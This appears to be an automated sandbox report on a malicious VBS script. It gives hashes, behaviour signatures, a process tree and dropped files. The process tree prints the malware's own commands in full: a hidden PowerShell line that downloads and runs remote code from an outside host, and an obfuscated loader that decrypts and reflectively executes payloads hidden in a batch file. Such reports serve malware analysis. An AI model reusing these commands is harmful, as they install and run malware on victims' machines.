Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-12-2024 02:22

General

  • Target

    407ed762a35023eb5eb69738dd20a7c23ac03e187717029a0712b1826750d549.vbs

  • Size

    60KB

  • MD5

    dcaadf5b6a871821a09e8be7f12603b0

  • SHA1

    49c943609633112b80fe7b50c79ca6eb072eb3be

  • SHA256

    407ed762a35023eb5eb69738dd20a7c23ac03e187717029a0712b1826750d549

  • SHA512

    e18a9bda8f0efeb8bc490b320f86b14a7bc3fb667af4c193b9159d780aabe11da48bec08a6d605f2f08c65d661b5f8e572bf52e5fd712735196d46ea68a15db8

  • SSDEEP

    1536:akm3NbS839HXCQHXFNx7X+xW7lflsAmPUoLlXBCbB:aLl3pCQ35+EDu3y

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\407ed762a35023eb5eb69738dd20a7c23ac03e187717029a0712b1826750d549.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1200
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DK2yqtn/8WWLFGdN0SGSXoqb0xwC458hY3mEb0Z8Op4='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Tn8+JuQ0zcIx9j+6ZeLoqQ=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2876

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\system.bat

    Filesize

    53KB

    MD5

    eef9239b6e6433e968d7328eb78e5aa4

    SHA1

    00ea660bb2189b9e43a4fa2c7f971bdee84701f3

    SHA256

    15587d9e6274cbe0c11a4f3c45f80d677d76b74840cbe53ee77e6387808e48c2

    SHA512

    8cc45b3dec7c7bf8f4c2f621bfd531a65a6e457f20a5d0bf887afc4eaa6a2364fa59de60ffdf72dc7950b7a7148261783e959d9c3cf28dcc496f1752501d828d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VDQY4BWIXEZLP0BY0J6A.temp

    Filesize

    7KB

    MD5

    76f9500e5be96ce2e237c04a7172547c

    SHA1

    b8b0fd312ebdd0140e7cbb13c2db64fb2bcf5fd3

    SHA256

    b9bf1d6522cab6c1b9644ac2f5a2c1d323d61eebd778faeb77a533f63f7f9af1

    SHA512

    aa3bc87ddc71dc27efca86bfa092fc2ffc985e5db5d2ab244dfb3891625c66ac823e165600593b66ed6482cec2f415f61f36cf897174a28c7e63410955387cb1

  • memory/1200-4-0x000007FEF582E000-0x000007FEF582F000-memory.dmp

    Filesize

    4KB

  • memory/1200-6-0x00000000023C0000-0x00000000023C8000-memory.dmp

    Filesize

    32KB

  • memory/1200-5-0x000000001B580000-0x000000001B862000-memory.dmp

    Filesize

    2.9MB

  • memory/1200-7-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1200-8-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1200-9-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1200-11-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1200-10-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB